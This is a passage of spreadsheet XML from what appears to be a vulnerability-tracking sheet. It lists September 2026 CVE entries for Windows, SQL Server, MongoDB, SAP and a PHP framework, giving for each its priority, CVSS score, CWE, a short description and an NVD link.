          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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0" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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1" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Maravel, a PHP framework oriented towards dependency injection, prior to version 10.74.0 has a high-severity Token Replay Vulnerability arising from a structural lifecycle mismatch between stateless token validation engines and high-performance relational caching layers. Any application with low cache memory that causes premature eviction to free up memory and applications running macropay-solutions/maravel-framework that utilize tymon/jwt-auth for API token authentication and blacklist management or any other package that does the same may be affected. This architectural risk might also impact native Laravel applications utilizing cache tags under specific volatile or eviction-capped environments. tymon/jwt-auth automatically probes for cache tag support. If found, it forcefully wraps 14-day token blacklist entries (jti) inside a relational tymon.jwt tag. In environments where the O(1) Atomic Lazy Eviction model is active — either natively inside Maravel-Framework v20.x or manually backported into v10.x via the explicit DI container singletons provided in PR #104 (App\Cache\TaggedCache and App\Cache\TagSet) — a strict global tracking ceiling (Container::TAGGED_CACHE_TTL_CAP_SECONDS) of 7,200 seconds (2 hours) is enforced to secure the system against memory index bloat. This ceiling forcefully truncates the 14-day blacklist lifespan down to a maximum of 2 hours, after which individual tracking keys naturally expire and disappear from the active cache window. Furthermore, because the optimized engine implements a generational version matrix to achieve O(1) flush speeds, any programmatic or manual invocation of a tag flush or reset (e.g., Cache::tags([...])-&gt;flush()) instantly bumps the internal atomic master version pointer. This shifts the computed cryptographic composite hash (sha1($this-&gt;tags-&gt;getNamespace())) for all overlapping components, rendering the entire existing index immediately unreachable. Consequently, through either natural 2-hour expiration or an intervening tag flush execution (like the cache naturally cleaning old values to free up memory), the invalidation state records are entirely wiped out. Because the tokens' physical cryptographic signatures remain structurally valid for up to 14 days, stolen, hijacked, or legitimately logged-out tokens are instantly and silently resurrected across the entire API gateway, leaving the application critically vulnerable to widespread Token Replay Attacks. Because this issue is caused by an upstream architectural assumption within the tymon/jwt-auth package rather than a core defect inside the framework, there is no direct framework version upgrade that can safely bypass this lifecycle collision without breaking business cache recycling bounds. Maravel version 10.74.0 introduced a way to backport the new fixed tagged cache from 20.x into 10.x by resolving TagSet and TaggedCache from DI, which is how this latent architectural lifecycle vulnerability was discovered. Users must apply the decoupled configuration workaround outlined below. As a workaround, make sure that cache memory size does not generate early natural evictions from cache to free up space, deleting blacklisted jwt ids before they expire. Applications must decouple flat authentication vectors from the relational tagging subsystem. This forces token identifiers to write directly to the primary cache keyspace as flat, un-tagged key-value pairs where they securely retain their unclipped 14-day lifecycle.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an unauthenticated network user to cause a denial of service on a specific type of replica set member. The server contains an assertion in its read concern processing logic that can be reached without authentication, and the assertion's assumptions about internal state do not hold for all member configurations, causing the server process to terminate.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled resource consumption weakness exists in the request-handling path of the MongoDB sharded-cluster router process. A client that has network access to a router port and has not authenticated can supply connection-monitoring parameters that cause the server to expend CPU resources without any rate limiting, degrading or denying service to legitimate clients. No authentication, elevated privileges, or user interaction is required. Only availability is affected; data confidentiality and integrity are not impacted.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>SAP Integration Suite does not sufficiently validate XML documents accepted from untrusted sources in certain internal components. An attacker with low privileges could submit specially crafted XML payloads containing malicious external entity declarations. Successful exploitation could allow the attacker to read sensitive file contents from the server and expose them through monitoring or logging output, resulting in a high impact on confidentiality. It could also lead to resource exhaustion, causing a low impact on availability. There is no impact on integrity.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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7" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
